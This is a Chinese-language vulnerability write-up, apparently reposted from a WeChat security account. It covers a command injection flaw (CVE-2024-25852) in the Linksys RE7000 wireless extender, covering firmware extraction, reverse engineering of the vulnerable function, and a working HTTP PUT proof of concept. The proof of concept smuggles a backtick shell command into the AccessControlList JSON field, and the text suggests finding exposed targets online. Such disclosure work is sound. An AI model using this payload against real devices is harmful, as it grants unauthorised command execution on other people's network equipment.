【IoT安全】Linksys RE7000无线扩展器命令执行漏洞挖掘(CVE-2024-25852)

admin 2024年4月19日20:15:41评论28 views字数 1495阅读4分59秒阅读模式

1.漏洞介绍

产品描述:

Linksys是贝尔金旗下一个销售家用与小型业务用网络产品的部门,主要经营宽带与无线路由器。RE7000是Linksys推出的一款新型双频AC1900无线扩展器,具有无缝漫游功能。

固件下载:

https://downloads.linksys.com/support/assets/firmware/RE7000v2_PROD_FW_v2.0.15_211230_1012.bin

漏洞描述:

RE7000无线扩展器在访问控制功能点的“AccessControlList”参数中存在命令执行漏洞。攻击者可以利用该漏洞获取设备管理员权限。
受影响的版本:
RE7000 v2.0.9、RE7000 v2.0.11、RE7000 v2.0.15
分发CVE编号:

CVE-2024-25852

2.漏洞分析

洞触发功能点Access Control

【IoT安全】Linksys RE7000无线扩展器命令执行漏洞挖掘(CVE-2024-25852)

使用binwalk工具提取固件文件系统:

binwalk -Me --run-as=root RE7000v2_PROD_FW_v2.0.15_211230_1012.bin

使用grep工具快速查找漏洞参数:

grep -rl AccessControlList | grep .so

【IoT安全】Linksys RE7000无线扩展器命令执行漏洞挖掘(CVE-2024-25852)

使用IDA逆向工具打开libcbtjson.so文件,按Alt+t搜索“AccessControlList”关键字:

【IoT安全】Linksys RE7000无线扩展器命令执行漏洞挖掘(CVE-2024-25852)

进入“.rodata:0003B60C”只读数据地址,看到各类参数名称,分别用于控制不同的功能:

【IoT安全】Linksys RE7000无线扩展器命令执行漏洞挖掘(CVE-2024-25852)

进入“set_accessControlList”函数,通过“set_value_nvram”函数获取传入参数a1和a2,通过“fprintf”函数将a1和a2变量格式化输出,最后将a2代入“cbt_system”函数执行系统命令。

【IoT安全】Linksys RE7000无线扩展器命令执行漏洞挖掘(CVE-2024-25852)

3.漏洞复现

通过qemu固件模拟或搜索网络资产目标:

【IoT安全】Linksys RE7000无线扩展器命令执行漏洞挖掘(CVE-2024-25852)

漏洞利用POC:

PUT /goform/AccessControl HTTP/1.1Host: ipUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflate, brConnection: closeUpgrade-Insecure-Requests: 1If-Modified-Since: Thu, 17 Sep 2020 11:24:58 GMTIf-None-Match: "14600429"Content-Length: 81{"AccessPolicy":"0","AccessControlList":"`ps>/etc_ro/lighttpd/RE7000_www/1.txt`"}

V2.0.15版本漏洞复现:

【IoT安全】Linksys RE7000无线扩展器命令执行漏洞挖掘(CVE-2024-25852)

BurpSuite工具发送POC并执行ps命令输出到1.txt文件:

【IoT安全】Linksys RE7000无线扩展器命令执行漏洞挖掘(CVE-2024-25852)

访问1.txt文件可以看到攻击成功了。

【IoT安全】Linksys RE7000无线扩展器命令执行漏洞挖掘(CVE-2024-25852)

4.挖掘成果

漏洞报告提交后获取CVE编号和CNVD漏洞证书:

【IoT安全】Linksys RE7000无线扩展器命令执行漏洞挖掘(CVE-2024-25852)

【IoT安全】Linksys RE7000无线扩展器命令执行漏洞挖掘(CVE-2024-25852)

现存多张CNVD/CNNVD/CVE证书,需要的小伙伴可以添加下面微信咨询:

【IoT安全】Linksys RE7000无线扩展器命令执行漏洞挖掘(CVE-2024-25852)

原文始发于微信公众号(ZackSecurity):【IoT安全】Linksys RE7000无线扩展器命令执行漏洞挖掘(CVE-2024-25852)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年4月19日20:15:41
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【IoT安全】Linksys RE7000无线扩展器命令执行漏洞挖掘(CVE-2024-25852)https://cn-sec.com/archives/2672492.html

发表评论

匿名网友 填写信息